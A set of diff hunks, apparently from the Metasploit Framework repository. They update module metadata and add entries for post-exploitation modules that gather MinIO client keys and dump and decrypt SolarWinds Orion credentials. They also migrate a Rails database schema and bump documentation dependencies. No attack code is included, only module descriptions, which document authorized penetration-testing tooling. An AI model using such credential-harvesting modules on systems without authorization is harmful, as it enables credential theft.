    "fullname": "post/multi/gather/dbvis_enum",
@@ -207660,7 +209543,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-27 12:32:26 +0000",
    "path": "/modules/post/multi/gather/jenkins_gather.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/jenkins_gather",
@@ -207751,6 +209634,53 @@
    ],
    "needs_cleanup": null
  },
+  "post_multi/gather/minio_client": {
+    "name": "Gather MinIO Client Key",
+    "fullname": "post/multi/gather/minio_client",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Kali-Team <kali-team@qq.com>"
+    ],
+    "description": "This is a module that searches for MinIO Client credentials on a windows remote host.",
+    "references": [
+      "URL-https://blog.kali-team.cn/Metasploit-MinIO-Client-7d940c60ae8545aeaa29c96536dda855"
+    ],
+    "platform": "Linux,OSX,Unix,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-11 14:30:23 +0000",
+    "path": "/modules/post/multi/gather/minio_client.rb",
+    "is_install_path": true,
+    "ref_name": "multi/gather/minio_client",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "powershell",
+      "shell"
+    ],
+    "needs_cleanup": null
+  },
  "post_multi/gather/multi_command": {
    "name": "Multi Gather Run Shell Command Resource File",
    "fullname": "post/multi/gather/multi_command",
@@ -211238,7 +213168,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-11-17 16:49:11 +0000",
    "path": "/modules/post/windows/gather/bloodhound.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/bloodhound",
@@ -211251,6 +213181,12 @@
      ],
      "SideEffects": [
        "artifacts-on-disk"
+      ],
+      "Stability": [
+
+      ],
+      "Reliability": [
+
      ]
    },
    "session_types": [
@@ -211318,7 +213254,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-07-20 17:21:58 +0000",
+    "mod_time": "2022-11-29 21:28:15 +0000",
    "path": "/modules/post/windows/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/checkvm",
@@ -211326,9 +213262,19 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "meterpreter",
+      "powershell",
      "shell"
    ],
    "needs_cleanup": null
@@ -213821,6 +215767,53 @@
    ],
    "needs_cleanup": null
  },
+  "post_windows/gather/credentials/solarwinds_orion_dump": {
+    "name": "SolarWinds Orion Secrets Dump",
+    "fullname": "post/windows/gather/credentials/solarwinds_orion_dump",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2022-11-08",
+    "type": "post",
+    "author": [
+      "npm <npm@cesium137.io>",
+      "Rob Fuller"
+    ],
+    "description": "This module exports and decrypts credentials from SolarWinds Orion Network\n          Performance Monitor (NPM) to a CSV file; it is intended as a post-exploitation\n          module for Windows hosts with SolarWinds Orion NPM installed. The module\n          supports decryption of AES-256, RSA, and XMLSEC secrets. Separate actions for\n          extraction and decryption of the data are provided to allow session migration\n          during execution in order to log in to the SQL database using SSPI. Tested on\n          the 2020 version of SolarWinds Orion NPM. This module is possible only because\n          of the source code and technical information published by Rob Fuller and\n          Atredis Partners.",
+    "references": [
+      "URL-https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion/",
+      "URL-https://github.com/atredispartners/solarwinds-orion-cryptography"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-12-20 08:55:19 +0000",
+    "path": "/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/solarwinds_orion_dump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/spark_im": {
    "name": "Windows Gather Spark IM Password Extraction",
    "fullname": "post/windows/gather/credentials/spark_im",
@@ -216166,7 +218159,7 @@
    "author": [
      "mubix <mubix@hak5.org>"
    ],
-    "description": "This module pulls a user's proxy settings. If neither RHOST or SID\n        are set it pulls the current user, else it will pull the user's settings\n        specified SID and target host.",
+    "description": "This module pulls a user's proxy settings. If neither RHOST or SID\n        are set it pulls the current user, else it will pull the user's settings\n        for the specified SID and target host.",
    "references": [

    ],
@@ -216176,7 +218169,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-04 15:10:47 +0000",
    "path": "/modules/post/windows/gather/enum_proxy.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_proxy",
@@ -216184,9 +218177,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "powershell",
+      "shell"
    ],
    "needs_cleanup": null
  },
@@ -219380,7 +221384,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/post/windows/manage/sticky_keys.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/sticky_keys",
@@ -10,15 +10,14 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema.define(version: 2019_05_07_120211) do
-
+ActiveRecord::Schema[7.0].define(version: 2019_05_07_120211) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

  create_table "api_keys", id: :serial, force: :cascade do |t|
    t.text "token"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "async_callbacks", id: :serial, force: :cascade do |t|
@@ -27,16 +26,16 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "listener_uri"
    t.string "target_host"
    t.string "target_port"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "automatic_exploitation_match_results", id: :serial, force: :cascade do |t|
    t.integer "match_id"
    t.integer "run_id"
    t.string "state", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["match_id"], name: "index_automatic_exploitation_match_results_on_match_id"
    t.index ["run_id"], name: "index_automatic_exploitation_match_results_on_run_id"
  end
@@ -44,8 +43,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  create_table "automatic_exploitation_match_sets", id: :serial, force: :cascade do |t|
    t.integer "workspace_id"
    t.integer "user_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["user_id"], name: "index_automatic_exploitation_match_sets_on_user_id"
    t.index ["workspace_id"], name: "index_automatic_exploitation_match_sets_on_workspace_id"
  end
@@ -54,8 +53,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "module_detail_id"
    t.string "state"
    t.integer "nexpose_data_vulnerability_definition_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.integer "match_set_id"
    t.string "matchable_type"
    t.integer "matchable_id"
@@ -68,8 +67,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "workspace_id"
    t.integer "user_id"
    t.integer "match_set_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["match_set_id"], name: "index_automatic_exploitation_runs_on_match_set_id"
    t.index ["user_id"], name: "index_automatic_exploitation_runs_on_user_id"
    t.index ["workspace_id"], name: "index_automatic_exploitation_runs_on_workspace_id"
@@ -77,11 +76,11 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "clients", id: :serial, force: :cascade do |t|
    t.integer "host_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "ua_string", limit: 1024, null: false
    t.string "ua_name", limit: 64
    t.string "ua_ver", limit: 32
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
  end

  create_table "credential_cores_tasks", id: false, force: :cascade do |t|
@@ -96,8 +95,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "creds", id: :serial, force: :cascade do |t|
    t.integer "service_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "user", limit: 2048
    t.string "pass", limit: 4096
    t.boolean "active", default: true
@@ -110,9 +109,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  create_table "events", id: :serial, force: :cascade do |t|
    t.integer "workspace_id"
    t.integer "host_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "name"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.boolean "critical"
    t.boolean "seen"
    t.string "username"
@@ -123,7 +122,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "host_id"
    t.integer "service_id"
    t.integer "vuln_id"
-    t.datetime "attempted_at"
+    t.datetime "attempted_at", precision: nil
    t.boolean "exploited"
    t.string "fail_reason"
    t.string "username"
@@ -141,8 +140,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "session_uuid", limit: 8
    t.string "name", limit: 2048
    t.string "payload", limit: 2048
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "host_details", id: :serial, force: :cascade do |t|
@@ -157,7 +156,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "hosts", id: :serial, force: :cascade do |t|
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.inet "address", null: false
    t.string "mac"
    t.string "comm"
@@ -169,7 +168,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "os_lang"
    t.string "arch"
    t.integer "workspace_id", null: false
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.text "purpose"
    t.string "info", limit: 65536
    t.text "comments"
@@ -197,8 +196,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "listeners", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.integer "workspace_id", default: 1, null: false
    t.integer "task_id"
    t.boolean "enabled", default: true
@@ -217,8 +216,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "ltype", limit: 512
    t.string "path", limit: 1024
    t.text "data"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "content_type"
    t.text "name"
    t.text "info"
@@ -227,8 +226,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "macros", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "owner"
    t.text "name"
    t.text "description"
@@ -243,8 +242,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "public_id"
    t.integer "realm_id"
    t.integer "workspace_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.integer "logins_count", default: 0
    t.index ["origin_type", "origin_id"], name: "index_metasploit_credential_cores_on_origin_type_and_origin_id"
    t.index ["private_id"], name: "index_metasploit_credential_cores_on_private_id"
@@ -264,56 +263,56 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "service_id", null: false
    t.string "access_level"
    t.string "status", null: false
-    t.datetime "last_attempted_at"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "last_attempted_at", precision: nil
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["core_id", "service_id"], name: "index_metasploit_credential_logins_on_core_id_and_service_id", unique: true
    t.index ["service_id", "core_id"], name: "index_metasploit_credential_logins_on_service_id_and_core_id", unique: true
  end

  create_table "metasploit_credential_origin_cracked_passwords", id: :serial, force: :cascade do |t|
    t.integer "metasploit_credential_core_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["metasploit_credential_core_id"], name: "originating_credential_cores"
  end

  create_table "metasploit_credential_origin_imports", id: :serial, force: :cascade do |t|
    t.text "filename", null: false
    t.integer "task_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["task_id"], name: "index_metasploit_credential_origin_imports_on_task_id"
  end

  create_table "metasploit_credential_origin_manuals", id: :serial, force: :cascade do |t|
    t.integer "user_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["user_id"], name: "index_metasploit_credential_origin_manuals_on_user_id"
  end

  create_table "metasploit_credential_origin_services", id: :serial, force: :cascade do |t|
    t.integer "service_id", null: false
    t.text "module_full_name", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["service_id", "module_full_name"], name: "unique_metasploit_credential_origin_services", unique: true
  end

  create_table "metasploit_credential_origin_sessions", id: :serial, force: :cascade do |t|
    t.text "post_reference_name", null: false
    t.integer "session_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["session_id", "post_reference_name"], name: "unique_metasploit_credential_origin_sessions", unique: true
  end

  create_table "metasploit_credential_privates", id: :serial, force: :cascade do |t|
    t.string "type", null: false
    t.text "data", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "jtr_format"
    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)"
    t.index ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT ((type)::text = 'Metasploit::Credential::SSHKey'::text))"
@@ -321,8 +320,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "metasploit_credential_publics", id: :serial, force: :cascade do |t|
    t.string "username", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "type", null: false
    t.index ["username"], name: "index_metasploit_credential_publics_on_username", unique: true
  end
@@ -330,8 +329,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  create_table "metasploit_credential_realms", id: :serial, force: :cascade do |t|
    t.string "key", null: false
    t.string "value", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["key", "value"], name: "index_metasploit_credential_realms_on_key_and_value", unique: true
  end

@@ -361,7 +360,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "module_details", id: :serial, force: :cascade do |t|
-    t.datetime "mtime"
+    t.datetime "mtime", precision: nil
    t.text "file"
    t.string "mtype"
    t.text "refname"
@@ -371,7 +370,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.text "description"
    t.string "license"
    t.boolean "privileged"
-    t.datetime "disclosure_date"
+    t.datetime "disclosure_date", precision: nil
    t.integer "default_target"
    t.text "default_action"
    t.string "stance"
@@ -402,7 +401,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "module_runs", id: :serial, force: :cascade do |t|
-    t.datetime "attempted_at"
+    t.datetime "attempted_at", precision: nil
    t.text "fail_detail"
    t.string "fail_reason"
    t.text "module_fullname"
@@ -414,8 +413,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "trackable_type"
    t.integer "user_id"
    t.string "username"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["session_id"], name: "index_module_runs_on_session_id"
    t.index ["user_id"], name: "index_module_runs_on_user_id"
  end
@@ -428,8 +427,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "nexpose_consoles", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.boolean "enabled", default: true
    t.text "owner"
    t.text "address"
@@ -444,12 +443,12 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "notes", id: :serial, force: :cascade do |t|
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "ntype", limit: 512
    t.integer "workspace_id", default: 1, null: false
    t.integer "service_id"
    t.integer "host_id"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.boolean "critical"
    t.boolean "seen"
    t.text "data"
@@ -471,13 +470,13 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "raw_payload_hash"
    t.string "build_status"
    t.string "build_opts"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "profiles", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.boolean "active", default: true
    t.text "name"
    t.text "owner"
@@ -486,9 +485,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "refs", id: :serial, force: :cascade do |t|
    t.integer "ref_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "name", limit: 512
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.index ["name"], name: "index_refs_on_name"
  end

@@ -497,8 +496,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "created_by"
    t.string "path", limit: 1024
    t.text "name"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "reports", id: :serial, force: :cascade do |t|
@@ -507,9 +506,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "rtype"
    t.string "path", limit: 1024
    t.text "options"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
-    t.datetime "downloaded_at"
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
+    t.datetime "downloaded_at", precision: nil
    t.integer "task_id"
    t.string "name", limit: 63
  end
@@ -522,12 +521,12 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "services", id: :serial, force: :cascade do |t|
    t.integer "host_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.integer "port", null: false
    t.string "proto", limit: 16, null: false
    t.string "state"
    t.string "name"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.text "info"
    t.index ["host_id", "port", "proto"], name: "index_services_on_host_id_and_port_and_proto", unique: true
    t.index ["name"], name: "index_services_on_name"
@@ -543,7 +542,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.binary "output"
    t.string "remote_path"
    t.string "local_path"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
  end

  create_table "sessions", id: :serial, force: :cascade do |t|
@@ -555,11 +554,11 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "port"
    t.string "platform"
    t.text "datastore"
-    t.datetime "opened_at", null: false
-    t.datetime "closed_at"
+    t.datetime "opened_at", precision: nil, null: false
+    t.datetime "closed_at", precision: nil
    t.string "close_reason"
    t.integer "local_id"
-    t.datetime "last_seen"
+    t.datetime "last_seen", precision: nil
    t.integer "module_run_id"
    t.index ["module_run_id"], name: "index_sessions_on_module_run_id"
  end
@@ -571,51 +570,51 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.boolean "report_summary", default: false, null: false
    t.boolean "report_detail", default: false, null: false
    t.boolean "critical", default: false, null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_creds", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "cred_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_hosts", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "host_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_services", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "service_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "task_sessions", id: :serial, force: :cascade do |t|
    t.integer "task_id", null: false
    t.integer "session_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "tasks", id: :serial, force: :cascade do |t|
    t.integer "workspace_id", default: 1, null: false
    t.string "created_by"
    t.string "module"
-    t.datetime "completed_at"
+    t.datetime "completed_at", precision: nil
    t.string "path", limit: 1024
    t.string "info"
    t.string "description"
    t.integer "progress"
    t.text "options"
    t.text "error"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "result"
    t.string "module_uuid", limit: 8
    t.binary "settings"
@@ -626,8 +625,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "crypted_password"
    t.string "password_salt"
    t.string "persistence_token"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "fullname"
    t.string "email"
    t.string "phone"
@@ -638,7 +637,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "vuln_attempts", id: :serial, force: :cascade do |t|
    t.integer "vuln_id"
-    t.datetime "attempted_at"
+    t.datetime "attempted_at", precision: nil
    t.boolean "exploited"
    t.string "fail_reason"
    t.string "username"
@@ -661,26 +660,26 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "nx_vuln_id"
    t.float "nx_severity"
    t.float "nx_pci_severity"
-    t.datetime "nx_published"
-    t.datetime "nx_added"
-    t.datetime "nx_modified"
+    t.datetime "nx_published", precision: nil
+    t.datetime "nx_added", precision: nil
+    t.datetime "nx_modified", precision: nil
    t.text "nx_tags"
    t.text "nx_vuln_status"
    t.text "nx_proof_key"
    t.string "src"
    t.integer "nx_scan_id"
-    t.datetime "nx_vulnerable_since"
+    t.datetime "nx_vulnerable_since", precision: nil
    t.string "nx_pci_compliance_status"
  end

  create_table "vulns", id: :serial, force: :cascade do |t|
    t.integer "host_id"
    t.integer "service_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "name"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.string "info", limit: 65536
-    t.datetime "exploited_at"
+    t.datetime "exploited_at", precision: nil
    t.integer "vuln_detail_count", default: 0
    t.integer "vuln_attempt_count", default: 0
    t.integer "origin_id"
@@ -696,8 +695,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_forms", id: :serial, force: :cascade do |t|
    t.integer "web_site_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "path"
    t.string "method", limit: 1024
    t.text "params"
@@ -707,15 +706,15 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_pages", id: :serial, force: :cascade do |t|
    t.integer "web_site_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "path"
    t.text "query"
    t.integer "code", null: false
    t.text "cookie"
    t.text "auth"
    t.text "ctype"
-    t.datetime "mtime"
+    t.datetime "mtime", precision: nil
    t.text "location"
    t.text "headers"
    t.binary "body"
@@ -726,8 +725,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_sites", id: :serial, force: :cascade do |t|
    t.integer "service_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "vhost", limit: 2048
    t.text "comments"
    t.text "options"
@@ -738,8 +737,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "web_vulns", id: :serial, force: :cascade do |t|
    t.integer "web_site_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "path", null: false
    t.string "method", limit: 1024, null: false
    t.text "params"
@@ -773,8 +772,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "respcode", limit: 16
    t.text "resphead"
    t.text "response"
-    t.datetime "created_at"
-    t.datetime "updated_at"
+    t.datetime "created_at", precision: nil
+    t.datetime "updated_at", precision: nil
  end

  create_table "wmap_targets", id: :serial, force: :cascade do |t|
@@ -783,8 +782,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "port"
    t.integer "ssl"
    t.integer "selected"
-    t.datetime "created_at"
-    t.datetime "updated_at"
+    t.datetime "created_at", precision: nil
+    t.datetime "updated_at", precision: nil
  end

  create_table "workspace_members", id: false, force: :cascade do |t|
@@ -794,8 +793,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "workspaces", id: :serial, force: :cascade do |t|
    t.string "name"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "boundary", limit: 4096
    t.string "description", limit: 4096
    t.integer "owner_id"
@@ -7,4 +7,4 @@ vendor
 # These files will be generated by build.rb and do not need to be committed
 docs
 metasploit-framework.wiki.old
-index.md
+/index.md
@@ -1 +1 @@
-3.0.2
+3.0.5
@@ -1,8 +1,11 @@
 source 'https://rubygems.org'

-gem 'jekyll', '~> 4.2.0'
+gem 'jekyll', '~> 4.3.0'
 gem 'just-the-docs', github: 'rapid7/just-the-docs', branch: 'r7_ver_custom'
+# Useful when testing local just-the-docs changes:
+#gem 'just-the-docs', path: '../../just-the-docs'
 gem 'webrick'
+gem 'rexml'

 group :jekyll_plugins do
  gem 'jekyll-sitemap'
@@ -1,6 +1,6 @@
 GIT
  remote: https://github.com/rapid7/just-the-docs.git
-  revision: 9c5e78f98185406e50ab04f523a86bd857e186cf
+  revision: 5c7ea378f6392ea19b52e8019ebaca8fc2331733
  branch: r7_ver_custom
  specs:
    just-the-docs (0.3.3)
@@ -12,8 +12,8 @@ GIT
 GEM
  remote: https://rubygems.org/
  specs:
-    addressable (2.8.0)
-      public_suffix (>= 2.0.2, < 5.0)
+    addressable (2.8.1)
+      public_suffix (>= 2.0.2, < 6.0)
    byebug (11.1.3)
    coderay (1.1.3)
    colorator (1.1.0)
